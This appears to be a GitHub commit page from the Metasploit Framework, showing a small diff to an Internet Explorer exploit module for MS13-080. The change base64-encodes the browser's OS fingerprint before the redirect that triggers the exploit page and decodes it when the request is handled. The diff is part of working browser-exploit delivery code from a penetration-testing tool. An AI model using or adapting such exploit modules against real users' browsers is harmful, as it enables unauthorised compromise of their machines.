Land #2528, base64 for ms13-080

rapid7 · Oct 16, 2013 · d13fa7e · d13fa7e
2 parents 2833d58 + 06a2122
commit d13fa7e
Showing 1 changed file with 9 additions and 2 deletions.
diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,6 +76,7 @@ def initialize(info={})
         },
       'DefaultOptions'  =>
         {
+          #'PrependMigrate'       => true,
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Privileged'     => false,
@@ -88,6 +89,7 @@ def initialize(info={})
   def get_check_html
     %Q|<html>
 <script>
+#{js_base64}
 #{js_os_detect}
 
 function os() {
@@ -119,7 +121,7 @@ def get_check_html
 }
 
 window.onload = function() {
-  window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();
+  window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
 }
 </script>
 </html>
@@ -280,7 +282,12 @@ def get_sploit_html(target_info)
 
   def on_request_uri(cli, request)
     if request.uri =~ /search\?o=(.+)\&d=(.+)$/
-      target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
+      target_info =
+      {
+        :os  => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),
+        :dll => Rex::Text.uri_decode($2)
+      }
+
       sploit = get_sploit_html(target_info)
       send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
       return